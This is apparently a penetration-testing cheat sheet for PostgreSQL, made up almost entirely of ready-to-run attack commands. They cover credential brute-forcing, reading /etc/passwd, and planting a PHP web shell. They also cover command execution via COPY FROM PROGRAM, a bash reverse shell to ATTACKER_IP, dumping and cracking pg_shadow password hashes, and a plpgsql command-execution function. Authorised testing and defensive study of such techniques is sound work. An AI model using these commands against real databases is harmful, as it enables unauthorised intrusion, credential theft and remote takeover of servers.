> ## Documentation Index
> Fetch the complete documentation index at: https://docs.bytejmp.com/llms.txt
> Use this file to discover all available pages before exploring further.

# 5432 - PostgreSQL

> PostgreSQL enumeration and exploitation: COPY command RCE, file read/write, and credential extraction.

## Service Detection

```bash theme={"dark"}
nmap -sV -sC -p 5432 TARGET
```

***

## Connect

```bash theme={"dark"}
psql -h TARGET -U postgres
psql -h TARGET -U postgres -d database_name
psql "postgresql://postgres:password@TARGET/database"
```

***

## Brute-Force

```bash theme={"dark"}
hydra -L users.txt -P passwords.txt postgres://TARGET
# CrackMapExec/NetExec have no postgres protocol — use nmap or metasploit
nmap -p 5432 --script pgsql-brute TARGET
```

Default: `postgres` / `postgres` or blank.

***

## Enumeration

```sql theme={"dark"}
SELECT version();
SELECT current_user;
SELECT usename, passwd FROM pg_shadow;
\l              -- List databases
\dt             -- List tables
\du             -- List users/roles
SELECT * FROM pg_database;
```

***

## File Read

```sql theme={"dark"}
SELECT pg_read_file('/etc/passwd');
SELECT pg_read_file('/etc/passwd', 0, 1000);
```

### COPY

```sql theme={"dark"}
CREATE TABLE tmp(data text);
COPY tmp FROM '/etc/passwd';
SELECT * FROM tmp;
```

***

## File Write

```sql theme={"dark"}
COPY (SELECT '<?php system($_GET["cmd"]); ?>') TO '/var/www/html/shell.php';
```

***

## Command Execution

### COPY ... FROM PROGRAM (PostgreSQL 9.3+)

```sql theme={"dark"}
CREATE TABLE cmd(output text);
COPY cmd FROM PROGRAM 'id';
SELECT * FROM cmd;
```

```sql theme={"dark"}
COPY cmd FROM PROGRAM 'bash -c "bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1"';
```

### Large Object

```sql theme={"dark"}
SELECT lo_import('/etc/passwd');
SELECT lo_export(OID, '/tmp/output');
```

***

## Password Hashes

```sql theme={"dark"}
SELECT usename, passwd FROM pg_shadow;
```

The `pg_shadow` value is `md5` + `md5(password + username)`. Strip the `md5` prefix and crack as raw MD5 with the username appended to each candidate (mode 12 is only for a captured CRAM-MD5 *auth handshake*, not this stored hash):

```bash theme={"dark"}
# hash.txt: the hex after the 'md5' prefix; append username to candidates via a rule/mask
hashcat -m 0 hash.txt /usr/share/wordlists/rockyou.txt
```

***

## Extensions

### RCE via Extension

If superuser:

```sql theme={"dark"}
CREATE OR REPLACE FUNCTION cmd(text) RETURNS void AS $$
BEGIN
    EXECUTE 'COPY (SELECT '''') TO PROGRAM ''' || $1 || '''';
END;
$$ LANGUAGE plpgsql;

SELECT cmd('id');
```

***

## NSE Scripts

```bash theme={"dark"}
nmap -p 5432 --script pgsql-brute TARGET
```

***

## Quick Reference

| Check       | Command                                 |
| ----------- | --------------------------------------- |
| Connect     | `psql -h TARGET -U postgres`            |
| Read file   | `SELECT pg_read_file('/etc/passwd')`    |
| RCE         | `COPY cmd FROM PROGRAM 'id'`            |
| Write file  | `COPY (SELECT 'data') TO '/path/file'`  |
| Dump hashes | `SELECT usename, passwd FROM pg_shadow` |
